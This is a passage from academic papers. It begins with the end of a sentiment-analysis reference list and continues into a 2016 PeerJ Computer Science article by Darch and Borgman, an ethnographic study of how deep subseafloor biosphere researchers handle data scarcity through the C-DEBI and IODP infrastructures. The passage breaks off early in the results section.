Ng. 2012. Semantic compositionality through recursive matrix-vector spaces. In Proceed- ings of the Conference on Empirical Methods in Natu- ral Language Processing, pages 1201–1211. Swapna Somasundaran and Janyce Wiebe. 2009. Rec- ognizing stances in online debates. In Proceedings of the Joint conference of the 47th Annual Meeting of the Association for Computational Linguistics and the 4th International Joint Conference on Natural Language Processing of the Asian Federation of Natural Lan- guage Processing, pages 226–234. Maite Taboada, Julian Brooke, Milan Tofiloski, Kim- berly D. Voll, and Manfred Stede. 2011. Lexicon- based methods for sentiment analysis. Computational Linguistics, 37(2):267–307. Oscar Täckström and Ryan McDonald. 2011. Discov- ering fine-grained sentiment with latent variable struc- tured prediction models. In Proceedings of the 33rd European conference on Advances in information re- trieval, ECIR’11, pages 368–374, Berlin, Heidelberg. Springer-Verlag. Cigdem Toprak, Niklas Jakob, and Iryna Gurevych. 2010. Sentence and expression level annotation of opinions in user-generated discourse. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, ACL ’10, pages 575–584, Stroudsburg, PA, USA. Association for Computational Linguistics. Ioannis Tsochantaridis, Thomas Hofmann, Thorsten Joachims, and Yasemin Altun. 2004. Support vec- tor machine learning for interdependent and structured output spaces. In Proceedings of the International Conference on Machine Learning, pages 104–112. Wei Wei and Jon Atle Gulla. 2010. Sentiment learn- ing on product reviews via sentiment ontology tree. In Proceedings of the Annual meeting of the Association for Computational Linguistics, pages 404–413. Janyce Wiebe, Theresa Wilson, and Claire Cardie. 2005. Annotating expressions of opinions and emotions in language. Language Resources and Evaluation, 39(2- 3):165–210. Theresa Wilson, Janyce Wiebe, and Paul Hoffmann. 2005. Recognizing contextual polarity in phrase-level sentiment analysis. In Proceedings of the confer- ence on Human Language Technology and Empirical Methods in Natural Language Processing, HLT ’05, pages 347–354, Stroudsburg, PA, USA. Association for Computational Linguistics. Theresa Ann Wilson. 2008. Fine-grained subjectivity and sentiment analysis: recognizing the intensity, po- larity, and attitudes of private states. Ph.D. thesis, UNIVERSITY OF PITTSBURGH. Yuanbin Wu, Qi Zhang, Xuanjing Huang, and Lide Wu. 2011. Structural opinion mining for graph-based sen- timent representation. In Proceedings of the Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 1332–1341. Ainur Yessenalina and Claire Cardie. 2011. Composi- tional matrix-space models for sentiment analysis. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 172–182. Chun-Nam John Yu and Thorsten Joachims. 2009. Learning structural svms with latent variables. In Pro- ceedings of the International Conference on Machine Learning, page 147. Ning Yu and Sandra Kübler. 2011. Filling the gap: Semi-supervised learning for opinion detection across domains. In Proceedings of the Fifteenth Conference on Computational Natural Language Learning, pages 200–209. Association for Computational Linguistics. 167 168 work_m7bikytkibezlorb42jgqtvbsi ---- Submitted 4 March 2016 Accepted 10 October 2016 Published 14 November 2016 Corresponding author Peter T. Darch, ptdarch@illinois.edu Academic editor Sally Jo Cunningham Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.97 Copyright 2016 Darch and Borgman Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Ship space to database: emerging infrastructures for studies of the deep subseafloor biosphere Peter T. Darch1 and Christine L. Borgman2 1 School of Information Sciences, University of Illinois at Urbana-Champaign, Urbana-Champaign, IL, United States 2 Information Studies, University of California, Los Angeles, CA, United States ABSTRACT Background. An increasing array of scientific fields face a ‘‘data deluge.’’ However, in many fields data are scarce, with implications for their epistemic status and ability to command funding. Consequently, they often attempt to develop infrastructure for data production, management, curation, and circulation. A component of a knowledge infrastructure may serve one or more scientific domains. Further, a single domain may rely upon multiple infrastructures simultaneously. Studying how domains negotiate building and accessing scarce infrastructural resources that they share with other domains will shed light on how knowledge infrastructures shape science. Methods. We conducted an eighteen-month, qualitative study of scientists studying the deep subseafloor biosphere, focusing on the Center for Dark Energy Biosphere Investigations (C-DEBI) and the Integrated Ocean Drilling Program (IODP) and its successor, the International Ocean Discovery Program (IODP2). Our methods com- prised ethnographic observation, including eight months embedded in a laboratory, interviews (n=49), and document analysis. Results. Deep subseafloor biosphere research is an emergent domain. We identified two reasons for the domain’s concern with data scarcity: limited ability to pursue their research objectives, and the epistemic status of their research. Domain researchers adopted complementary strategies to acquire more data. One was to establish C-DEBI as an infrastructure solely for their domain. The second was to use C-DEBI as a means to gain greater access to, and reconfigure, IODP/IODP2 to their advantage. IODP/IODP2 functions as infrastructure for multiple scientific domains, which creates competition for resources. C-DEBI is building its own data management infrastructure, both to acquire more data from IODP and to make better use of data, once acquired. Discussion. Two themes emerge. One is data scarcity, which can be understood only in relation to a domain’s objectives. To justify support for public funding, domains must demonstrate their utility to questions of societal concern or existential questions about humanity. The deep subseafloor biosphere domain aspires to address these questions in a more statistically intensive manner than is afforded by the data to which it currently has access. The second theme is the politics of knowledge infrastructures. A single scientific domain may build infrastructure for itself and negotiate access to multi-domain infrastructure simultaneously. C-DEBI infrastructure was designed both as a response to scarce IODP/IODP2 resources, and to configure the data allocation processes of IODP/IODP2 in their favor. How to cite this article Darch and Borgman (2016), Ship space to database: emerging infrastructures for studies of the deep subseafloor biosphere. PeerJ Comput. Sci. 2:e97; DOI 10.7717/peerj-cs.97 https://peerj.com mailto:ptdarch@illinois.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.97 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.97 Subjects Human-Computer Interaction, Digital Libraries Keywords Knowledge infrastructures, Scientific data, Microbiology, Long tail, Big science, Little science, Big data, Little data, Cyberinfrastructure, Data infrastructure INTRODUCTION The array of scientific fields facing a ‘‘data deluge’’ has grown rapidly in the years since the term was coined (Hey & Trefethen, 2003, p. 809). New instruments are capable of collecting data at greater volume, variety, and velocity than ever before. Consequences of these developments include the emergence of new infrastructures, changes in epistemologies, and new forms of collaborative work (Kitchin, 2014; Leonelli, 2014). However, in many fields data are scarce and hard won (Borgman, 2015; Kitchin & Lauriault, 2014); their problem is the opposite of ‘‘big data.’’ Domains suffering data scarcity may have lower epistemic status than those enjoying ‘‘data wealth’’ (Sawyer, 2008, p. 355). Consequently, they may attempt to increase their resources by developing better infrastructure to produce, manage, curate, and circulate the data they do have. We examine how a community of researchers studying the deep subseafloor biosphere experiences data scarcity, and how they develop knowledge infrastructures to address this scarcity. This scientific domain experiences acute data scarcity because it aspires to address questions of societal concern and existential questions about humanity in a more statistically intensive manner than is presently possible. Two infrastructures have been critical to this community’s development (Darch & Sands, 2015). One was established long before the emergence of the deep subseafloor biosphere as a topic of scientific study and is shared with other domains. This is the Integrated Ocean Drilling Program (IODP, 2003–2013) and its successor, the International Ocean Discovery Program (IODP2, from 2013), an international organization that conducts scientific ocean drilling cruises on behalf of scientists studying physical and biological phenomena related to the seafloor (International Ocean Discovery Program, 2014). The second infrastructure is specific to the deep subseafloor biosphere, namely the Center for Dark Energy Biosphere Investigations, or C-DEBI (Edwards, 2009). We explore the relationships between IODP/IODP2 infrastructure and C-DEBI infrastructure. Multiple domains compete for the scarce infrastructural resources of IODP/IODP2, such as space on drilling cruises for people and equipment, cores that are acquired on those cruises, and the work of data analysts and curators employed by IODP/IODP2. The features of C-DEBI, including its structure, modes of providing financial support for researchers, and its data infrastructure, are designed to enable deep subseafloor biosphere researchers to do the following: 1. exploit existing IODP/IODP2 resources allocated to deep subseafloor biosphere research; and 2. make more effective interventions in the inter-domain politics of IODP/IODP2 infrastructure, thereby securing a greater share of IODP/IODP2 resources for their community. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 2/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Many scientific fields rely on both single- and multi-domain infrastructure, thus our findings apply to infrastructure far beyond the subseafloor biosphere domain. BACKGROUND AND RESEARCH QUESTIONS In this section we introduce our research questions with a review of relevant literature. First we frame the concept of knowledge infrastructures, exploring how they develop, support, and constrain scientific practice. We consider the interaction between infrastructure specific to a single domain and infrastructure shared between domains. Second, we discuss how and why the availability of data is a critical concern in science, with attention to how domains address data scarcity. Third, we present more background on deep subseafloor biosphere research to explain why this scientific domain is an ideal site to study the interaction of knowledge infrastructures. Knowledge infrastructures The term infrastructure is often used in reference to large-scale systems with multiple social and technical components that provide services, resources, and facilities (Edwards et al., 2009). Infrastructures, in the senses used herein, are ‘‘best understood as ecologies or complex adaptive systems’’ (Borgman, 2015, p. 33). Infrastructures are complex in the sense that they comprise multiple systems that may have been devised, built, and configured by different actors with varying objectives, but which function together. They are continuously adaptive in the sense that components change or are introduced (Edwards et al., 2013). A particular type of infrastructure is ‘‘knowledge infrastructures,’’ which Edwards (2010, p. 17) defined as ‘‘robust networks of people, artifacts, and institutions that generate, share, and maintain specific knowledge about the human and natural worlds.’’ Infrastructure is a ‘‘fundamentally relational concept’’ in the sense that a sociotechnical configuration ‘‘becomes infrastructure in relation to organized practices’’ (Star & Ruhleder, 1996, p. 113). From the point of view of a particular domain, what is considered to be a knowledge infrastructure is precisely those configurations of social and technical components that provide resources to support a community’s shared objectives and practices. Indeed, as a domain’s interests and practices change, the knowledge infrastructure must adapt if the domain is to remain relevant (Ribes & Polk, 2015). Single vs. multi-domain infrastructures In some instances, a component of a knowledge infrastructure may serve one scientific domain alone. In other cases, a component serving one scientific domain may also serve as part of a knowledge infrastructure for others. Over time, these relationships tend to shift, re- quiring both infrastructures and domains to adapt, sometimes willingly, sometimes less so. The Large Synoptic Survey Telescope (LSST), a telescope under construction with a projected budget of $1.1 billion, is an important example of a multi-domain infrastructure. LSST promises to provide data unprecedented in scale and scope for multiple domains within astronomy (LSST Science Collaboration et al., 2009). The process of building LSST requires negotiation between domains on decisions such as how to allocate scarce observing time during the planned ten years of data collection. This multiple-domain infrastructure, Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 3/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 in turn, interacts with infrastructures serving single domains within astronomy. These include the Dark Energy Survey, and the Gaia Telescope, which focuses on the Milky Way (Dark Energy Survey, 2014; European Space Agency et al., 2016). These single-domain infrastructures were planned and began operations after significant funds were invested in LSST. The sociotechnical configurations of each project are shaped by LSST and vice versa (European Space Agency et al., 2016; LSST Science Collaboration et al., 2009). The authors of this paper also are involved in a case study of LSST (Borgman et al., 2015). Examples abound of interactions between single- and multiple-domain knowledge infrastructures. One example is between infrastructure that serves researchers studying earthquakes in Southern California only (Southern California Earthquake Center , 2016) and infrastructure that serves multiple domains related to the formation of volcanoes in the continent of North America (Earthscope, 2016). A second example is between infrastructure intended to support a single domain studying coastal dynamics and multi- domain infrastructure that collects and distributes data about oceans, coastal regions, and the US Great Lakes (Center for Coastal Margin Observation & Prediction, 2015; NOAA, 2016). Domains sharing infrastructure While infrastructures that serve individual domains have received the most study, other important infrastructures span multiple, and often competing domains. Domain-spanning infrastructures often represent significant investment of public research funding and are critical sources of data for the research communities they serve. Among the few shared infrastructures receiving scholarly attention is Argos, whose study by Benson (2012) revealed how marine biologists were able to negotiate a share of its infrastructural resources. Argos is a satellite-based environmental surveillance system that provides data for oceanography, meteorology, and marine biology (Ortega, 2003). Marine biologists persuaded Argos leaders to collect data elements important to them by appealing to the interests of their commercial partners. In return, the biologists compromised other elements of their data collection methods to satisfy Argos partners in oceanography and meteorology. Another perspective on negotiations in shared infrastructure is offered by Ribes & Finholt (2008), in their study of building infrastructure for studying the water environment. The forerunner to this infrastructure served a single community of researchers in environmental engineering, but the new infrastructure was intended to serve hydrological scientists as well. Ribes and Finholt show that the spokespeople of these domains negotiate infrastructure building more effectively when they represent a strong, clearly defined, and cohesive community. Various mechanisms for defining, canvassing the opinions of, and representing a community—such as organizing forums and conducting surveys—play an important role in facilitating these spokespeople’s effectiveness. Unfortunately, the effort to build this infrastructure fell apart before it began scientific operations (Jackson & Buyuktur, 2014). These studies suggest the importance of studying how domains negotiate processes of building and accessing infrastructural resources shared with other domains, and how the configurations of these infrastructures shape the work and organization of individual communities. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 4/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Data scarcity and abundance As science became more professionalized in the early twentieth century, more emphasis was placed on mathematical methods. These methods, in turn, require data generation and statistical confirmation (Bowler & Morus, 2010). That shift in focus endowed science with greater cultural authority as the primary knowledge-generating institution within society (Porter, 1996). The tight coupling of mathematization, data, and cultural authority helps to explain why domains that experience data scarcity are often so concerned with increasing their volume of data (Sawyer, 2008). For example, in molecular biology, increasing quantification and statistical inference were driven by ‘‘an ever-present methodological anxiety manifested in the constant search for an increased objectivity –or in its converse: the avoidance of subjectivity’’ (italics in original). These methodological changes both require and accommodate increasing quantities of data (Suárez-Díaz, & Anaya-Munoz, 2008, p. 452). By increasing quantification and data-intensive practices, communities can increase their scientific credibility (Hagen, 2003; Kay, 2000). Indeed, this increasing quantification frequently shapes, and is shaped by, hypothesis testing with laboratory-generated data (Lenoir, 1999; Paul, 2009). Least studied are situations where ‘‘no data’’ exist, whether because no data were collected about a particular phenomenon, data may have existed but were not curated for longer term use, or data still exist but cannot be discovered or retrieved for a variety of reasons (Borgman, 2015). Increasing data production Social mechanisms can encourage greater production of data and use of statistical methods. As domains develop norms that promote data-intensive research, those who eschew such approaches may be marginalized (Keller, 1984). A domain’s quest for enhanced status may drive changes at the institutional level, even leading to the development of new domains. Natural historians in the early 20th century, in the face of profound challenges to their domain’s status, made alliances with the more data-intensive and mathematically based discipline of population genetics, forming the new discipline of evolutionary biology (Ceccarelli, 2001). Domains sometimes address scarcity by producing large volumes of data. A notable example is cosmology, traditionally regarded as the poor relation to other domains of study in astronomy (such as lunar and solar astronomy) because they lacked sufficient data to support fundamental conjectures (Kragh, 1996). Cosmologists’ concern with this lowly status motivated the emergence of large telescope projects, known as sky surveys, that collect vast quantities of data about astronomical phenomena (Sloan Digital Sky Survey, 2016). Cosmology is now characterized by the use of data-intensive statistical methods (Strauss, 2014). Similarly, molecular biology addressed data scarcity by developing the Human Genome Project (Lenoir & Hays, 2000). Gaining access to extant data One way for a domain to address its data scarcity is to negotiate access to extant infrastructures, which often occurs in parallel with adopting computational- and data- intensive epistemologies (Chow-White & García-Sancho, 2012). Scientific databases are a Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 5/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 means to organize and classify information, providing ‘‘a contemporary key to both state and scientific power’’ (Bowker, 2005, p. 108). Infrastructure projects, in turn, may increase data production and circulation by shaping the behavior of scientists. Interoperability strategies include imposing or embedding common standards, such as what counts as reliable evidence, acceptable research methods, and data management practices (Bowker, 2005; Leonelli & Ankeny, 2012). Infrastructure can also foster norms of behavior that encourage greater openness within a scientific community, including openness around data (Leonelli, 2010). Contributions to a database can, in turn, encourage greater willingness to contribute to a database, resulting in a self-reinforcing cycle of increased data availability and normative shifts towards greater data openness. Databases can help encourage the circulation of types of data that the database does not support by creating expectations that scientists will share data when asked (Leonelli & Ankeny, 2012). Kelty (2012) discusses how scientific newsletters in biology not only constituted an infrastructure to build communities around particular organisms, but also promoted sharing of research objects by requiring openness of researchers as a condition of receiving the newsletter (and thus continued membership of the community). Lastly, and perhaps most importantly for knowledge infrastructures, is to address scarcity by building infrastructure that aggregates extant data or databases (Meyer, 2009), or that integrates existing sites of data production into a single infrastructure (Aronova, Baker & Oreskes, 2010). These databases play critical roles in supporting research and in fostering data-intensive methods (Bowker, 2000; Leonelli, 2012). One example is the Long Term Ecological Research Network, whose infrastructure attempts to improve the management and accessibility of data produced by distributed ecological research stations. This network originated in the efforts of biologists to leverage ‘‘Big Science’’ funding opportunities by collecting and organizing large-scale datasets (Aronova, Baker & Oreskes, 2010). However, a major barrier to data circulation and integration is the use of disparate standards by individual scientists, a problem particularly acute when scientists come from different disciplines or communities of practice (Baker, Jackson & Wanetick, 2005; Bietz & Lee, 2009; Borgman et al., 2015; Borgman et al., 2007). Scientists’ concerns about control of data, authorship rights, and incentives to undertake the work necessary to make their data shareable also limit the adoption of these infrastructures (Borgman, 2015; Borgman, Wallis & Enyedy 2007). Research questions Data scarcity is a critical problem for many scientific communities. Much richer accounts are needed of how domains employ infrastructural approaches to data scarcity. One approach is to emphasize scarce resources when negotiating access to infrastructure. As discussed above, competition arises when an infrastructure attempts to accommodate all types and forms of data present in the participating communities, particularly in the face of conflicting data standards and formats. A second approach is to consider relationships between an infrastructure and others with which it overlaps. A single domain may rely upon multiple infrastructures simultaneously. A domain that builds an infrastructure to increase its flow of data may be expressing dissatisfaction with the existing infrastructure. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 6/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 New infrastructure is likely to address the shortcomings and exploit affordances of existing infrastructures. These considerations motivate our three research questions: (1) How do scientific domains experience data scarcity? (2) How does a scientific domain address data scarcity through developing knowledge infrastructures? (3) What interactions occur between infrastructure specific to a domain and infrastructure shared with other domains? DEEP SUBSEAFLOOR BIOSPHERE RESEARCH Studies of the deep subseafloor biosphere draw together scientists from multiple physical and life science backgrounds who bring a wide variety of perspectives, tools, and methods (Darch et al., 2015). Researchers pursue their scientific goals by collecting and analyzing rocks from the seafloor, known as cores. Their work involves data about the microbial communities in these cores and the core’s physical properties, such as geochemical or hydrological. Scientific ocean drilling cruises are the primary source of cores for this community. From 2003 to 2013, the Integrated Ocean Drilling Program (IODP) operated these cruises. Scientific studies of the oceans receive extensive financial support from governments. As Mukerji (2014) argues, this support depends on the ability of oceanographic research to address questions of major social and political concern. Such concerns can include national defense, environmental issues, fisheries, and more recently, telecommunications. Thus, in 2013, US government support for scientific ocean drilling led to the International Ocean Discovery Program (IODP2) as the replacement for IODP. IODP2 uses the same ships, drilling technologies, and other resources as IODP, and provides infrastructure for many scientific domains, including plate tectonics. The Center for Dark Energy Biosphere Investigations (C-DEBI) is a Science and Technology Center (STC) funded by the US National Science Foundation (NSF), and launched in September 2010. C-DEBI was initially funded for five years, and successfully renewed for an additional five years (2015–2020). C-DEBI, which provides infrastructure for deep subseafloor biosphere researchers, has two main aims. One is to foster a community of researchers to study deep subseafloor microbial life, and the second is to promote scientific work on microbial ecology of the seafloor. This scientific work explores the role of subseafloor microbes in global environmental processes to improve knowledge of the origin, evolution, and extent of life on earth. These researchers are geographically distributed, with the Principal Investigator (PI) and four co-PIs based at five universities across the US. C-DEBI funding covers projects conducted by over 90 scientists in more than 40 universities and research institutions across the USA, Europe, and Asia (Center for Dark Energy Biosphere Investigations, 2016). C-DEBI was established before the NSF’s requirements for Data Management Plans, which began with proposals submitted in 2011 (National Science Foundation, 2010). However, C-DEBI was required to develop a plan for its renewal application in 2015 (Center for Dark Energy Biosphere Investigations, 2012a). By this time, senior personnel in Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 7/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 C-DEBI had become more aware of the inter-domain politics in IODP/IODP2, having participated in expeditions during 2011 and 2012. In response to this awareness, and to requirements for a data management plan, the process of constructing infrastructure for scientific data management in C-DEBI began. Thus, C-DEBI is itself a knowledge infrastructure for the domain of deep subseafloor biosphere research and C-DEBI has responsibility for developing further infrastructure components. Our focus in this article is the relationships between the IODP/IODP2 infrastructure and the C-DEBI infrastructure, and the influence of data scarcity or abundance. Our account pays attention to these relationships in the period up to C-DEBI’s renewal in summer 2015, although work on infrastructure continues. We highlight the critical role of negotiations between scientific domains as they contest scarce infrastructural resources. Single-domain infrastructures are both a response to, and an intervention in, these negotiations. Our study advances research on interactions between representatives of different domains (such as in formal meetings, and informal encounters), and as domains build infrastructures for themselves. We also advance research on the motivations for domains to build infrastructure for themselves by examining how such infrastructure is configured to leverage and intervene in the control of shared infrastructure. Analyzing this process, therefore, provides a valuable opportunity to understand the relationships between single- and multi-domain infrastructure, and is part of a larger study of knowledge infrastructures at multiple scientific sites (Borgman et al., 2015). RESEARCH METHODS We present findings from an eighteen-month, qualitative case study of scientists studying the deep subseafloor biosphere by focusing on C-DEBI and the ocean drilling programs on which it depends, the Integrated Ocean Drilling Program (IODP) and its successor, the International Ocean Discovery Program (IODP2). This community affords rich opportunities for answering our research questions, enabling us to explore relationships between C-DEBI and IODP/IODP2; to ask how and why scientists engage in building, configuring, and negotiating these infrastructures to access data; and how the scarce resources of IODP/IODP2 are contested between multiple domains. Our human subjects research was approved by the UCLA North General Institutional Review Board (#10-000909-CR-00002). Data collection A key feature of this case study is long-term ethnographic observation of C-DEBI (Hammersley & Atkinson, 2007). We were embedded for eight months in a laboratory headed by a leading figure in C-DEBI at a large US research university, which involved one of the authors visiting the laboratory for two or three days per week to observe bench work and laboratory meetings. The first author also conducted weeklong observational work in two other participating laboratories in the US and joined researchers on a three-day field research expedition. We made extensive notes about what we observed, including the physical layout of the laboratories and laboratory benches, tools and methods used, and Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 8/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 patterns of collaboration. Our informants told us about their backgrounds, aspirations, and experiences in the laboratories and on scientific cruises. These organizations are distributed across multiple institutions and countries, which posed issues of scalability for the researcher (Star, 1999). The work of C-DEBI and IODP/IODP2 spans more sites than a small team of researchers can visit, much less meet face-to-face with all personnel. We focused on the techniques and technologies—the ‘‘scalar devices’’—employed by our research subjects to understand C-DEBI, IODP/IODP2, and their domain (Ribes, 2014, p. 158). One scalar device that we observed was gatherings such as the C-DEBI All-Hands’ Meeting and research workshops. A larger gathering was the American Geophysical Union Fall Meeting 2013 in San Francisco, a major conference for the deep subseafloor biosphere community and IODP/IODP2; we also presented our early findings at this conference. These events enabled our research subjects to take stock of the scale of the communities and infrastructures in which they are embedded, in terms of the people involved, organizational hierarchies, and the range of scientific work conducted. Another form of scalar devices is reports and workplans, which we studied as part of document analysis (see below). The distributed nature of C-DEBI and IODP/IODP2 also means that work in these organizations often takes place through communications media. By using multiple forms of media, we could establish ‘‘co-presence’’ when ‘‘co-location’’ was not possible (Beaulieu, 2010). Co-presence involves the researcher witnessing how the work of scientific collaborations is conducted even when they are not physically (or necessarily temporally) collocated with the subjects of research. Lacking the opportunity to observe practices on board an IODP cruise, given the expense and limited places available, we studied IODP work conducted elsewhere. We attended online meetings and seminars where participation and data collection were planned, and watched a feature-length documentary that used footage from a deep subseafloor biosphere-focused cruise. Other online observations included workshops, meetings where key C-DEBI personnel planned infrastructure to coordinate data management across the project, and websites of organizations and people. We assembled a corpus of documents for analysis. Documents such as instruction manuals for laboratory equipment help to explain the work conducted by C-DEBI- affiliated scientists in their laboratories. Other documents help us to interpret contexts in which C-DEBI scientists operate. These include official C-DEBI documents such as the funding proposal, Annual Reports to the NSF, and operating documents for C-DEBI and IODP/IODP2. These documents function as scalar devices by giving details and metrics about activities, plans, and available infrastructural resources. Our research also draws heavily on semi-structured interviews; the sample for this article consists of 49 people, which includes C-DEBI-affiliated scientists, curators and managerial staff involved in IODP/IODP2, as detailed in Table 1. The column Involved in IODP indicates which C-DEBI interviewees are involved in decision- or policy-making in IODP/IODP2. These interviewees are further split into two groups: those in cruise operations, and those with the Consortium for Ocean Leadership, responsible for administering US involvement in IODP (but not IODP2). Interviews ranged in length Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 9/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Table 1 The composition of our interview sample. Career stage Interviewees Involved in IODP C-DEBI USA-based Undergraduate 5 0 Graduate student 9 0 Postdoctoral researcher 7 1 Faculty 13 2 Management 4 0 Non-USA-based Faculty 3 3 TOTAL C-DEBI 41 6 IODP Cruise operations Curator 2 Staff scientist 2 Technical support 1 Ocean Leadership Policy 2 Data management 1 TOTAL IODP 8 from 35 min to two and one-half hours, with the majority being between one and two hours long. With the consent of the interviewees, interviews were recorded and sent to an external company for transcription. C-DEBI interviewees were initially recruited from those scientists being observed in the laboratory, and were typically interviewed after an extended period of observation. Other C-DEBI interviewees were recruited from those who had been awarded C-DEBI-funded grants, with these interviews typically taking place over Skype. We have interviewed undergraduate and graduate students, postdoctoral researchers, faculty members, and non-scientists with senior level roles in administering and operating C-DEBI. IODP interviewees were identified and approached through a range of methods, including personal introductions from C-DEBI-affiliated scientists and other IODP personnel, and from public websites. Our interviews covered a range of topics, including interviewees’ backgrounds and career trajectories. We asked scientists and technical staff detailed questions about the scientific work they are undertaking and the importance and role of data in their work. We also asked IODP/IODP2 technical staff and C-DEBI scientists who have participated in IODP cruises about their work on board expeditions, how they negotiate for access to cruise resources, and how they transfer data, methods, techniques, and collaborative networks between cruises and their onshore laboratories. Non-scientists were asked about their roles in building and administering C-DEBI and IODP/IODP2 infrastructure. Where interview quotations are used in this paper, we add a code in parentheses after each quote indicating whether they are IODP or C-DEBI, their career stage, and a number unique to each interviewee: (IODP curator, #1) or (C-DEBI faculty, #3) etc. Data analysis Our initial data analysis involved close reading of our ethnographic notes, interview transcripts, and documents. Based on these readings, we identified emerging themes about the relational, complex, and dynamic nature of knowledge infrastructures, and coded our Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 10/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 data accordingly. In particular, we focused on themes relating to how those we interviewed described their own work (scientific, organizational, building infrastructure); how they identified and defined communities of which they considered themselves members; what resources, both current and anticipated, they identified as necessary to their own work and to deep subseafloor biosphere research as a whole; what they considered to be infrastructure; and how they and their community engaged with other scientific communities to negotiate, access, and build infrastructure. We refined our coding scheme iteratively, going back and forth between our scheme and the data. Using a range of sources enables us to triangulate, cross-checking our data to validate our findings (O’Donoghue & Punch, 2004). We began our data analysis after completing approximately six months of laboratory observation and fifteen interviews. We have thus been able to strike a balance between ensuring that our observations have not been biased by preconceived ideas and being able to assess our emerging findings and tentative hypotheses against further observations. We presented our emerging findings to the deep subseafloor biosphere research community at major scientific meetings (see above) for feedback and clarification. RESULTS Deep subseafloor biosphere research is a relatively new domain of study. Significant momentum for its emergence came in the late 1990s upon the publication of an article that extrapolated data about the size of microbiological communities in coastal sediments to the deep subseafloor (Whitman, Coleman & Wiebe, 1998). That article concluded that deep subseafloor microbes might constitute up to one-third of all of Earth’s biomass. This claim had major implications for important questions of scientific and human concern, such as the global nitrogen cycle. As a new domain of scientific study, and one for which little data existed prior to its emergence, the strategy of founding scientists rested on acquiring more data for research. This pursuit of more and better quality data continues to be a critical force to this day. Results are grouped into three sections. First, we frame the data scarcity problem in the terms of the deep subseafloor biosphere research community. Second, we discuss how this new research community established relationships with the international drilling programs, which is their major data source, and built some of their own complementary infrastructure. In this section, we also compare C-DEBI’s choices of infrastructure for data management to those of other NSF Science and Technology Centers that were founded in the same time period. Third, we explore how the C-DEBI and ocean drilling programs worked together, in ways more and less successful, to develop a robust research community for deep subseafloor biosphere research. Data scarcity Complaints by deep subseafloor biosphere scientists about the ‘‘dearth of data’’ for their core research questions led to the founding of C-DEBI (Edwards, 2009: 5). Relevant data still exist only for a few sites in the ocean and, compared to studies of microbial ecology in other environments, is about relatively basic phenomena. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 11/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Two reasons emerged for the community’s continuing concern with data scarcity. The first is constraints on scientists’ ability to pursue their field’s immediate research objectives, which are to characterize deep subseafloor microbial communities in terms of the quantity and types of microbes that exist, how these microbes interact with the physical environment they inhabit, and how microbial communities vary between geographic sites on the seafloor (Orcutt et al., 2013). As a C-DEBI report stated, ‘‘Evidence for microbial alteration [of the physical environment] exists, yet scientists lack robust molecular, biochemical, or physiological data so needed’’ (Center for Dark Energy Biosphere Investigations, 2011, p. 11). The second concern about data scarcity relates to the status of deep subseafloor biosphere research relative to studies of microbial ecology in other environments, and thus for their ability to attract future resources and funding. In the words of many scientists that we stud- ied, research on the deep subseafloor biosphere is largely exploratory or discovery-driven, while research on microbial ecology in other environments is largely hypothesis-driven: ‘‘Our work in the lab in general tends to be classified as rather exploratory as opposed to hypothesis-driven. This is something...that I met researchers who take issue with because they insist that to be a true science, proper science, you need to have a question and then you need to have a methodology that will either answer ‘yes’ or ‘no’, or some number. Whereas, our kind of science is oftentimes, it’s more like, ‘I wonder if...’ And then you try something and the results are occasionally interesting, and then you go, ‘Look what I found.’ You didn’t know what you were looking for, you just cast a big net out.’’ (C-DEBI graduate student, #1) As some C-DEBI scientists stated the problem, if the approach of deep subseafloor biosphere researchers has a lower scientific status than studies of microbial ecology in other environments, they will receive fewer or smaller grants because ‘‘funding agencies will rarely fund basic discovery science’’ (Teske, Biddle & Schrenk, 2011, p. 9). As the deep subseafloor biosphere emerged as a domain of study, researchers adopted a strategy of building and leveraging infrastructure to acquire more data. One of their strategies was to build infrastructure specifically for deep subseafloor biosphere researchers, first by establishing C-DEBI. The second strategy was to use C-DEBI as a means to gain greater access to, and to reconfigure, IODP2 for their advantage. Notably for our research questions, IODP/IODP2 is an infrastructure that deep subseafloor biosphere research shares with other scientific domains. IODP/IODP2 provides the requisite infrastructure for the C-DEBI community to access the geographic sites and to acquire the physical samples necessary to produce data about the deep subseafloor biosphere. C-DEBI was initially established as a way to consolidate the position of the deep subseafloor biosphere within IODP and to recruit new researchers into the domain. Over time, C-DEBI also began to build its own infrastructure to respond to the limitations of IODP in providing data, and to reconfigure the IODP2 infrastructure so that a greater share of IODP2 resources will be allocated to deep subseafloor biosphere researchers, thus increasing their supply of data. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 12/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Ocean drilling meets deep subseafloor biosphere research Interest in deep subseafloor microbial life that emerged in the late 1990s coincided 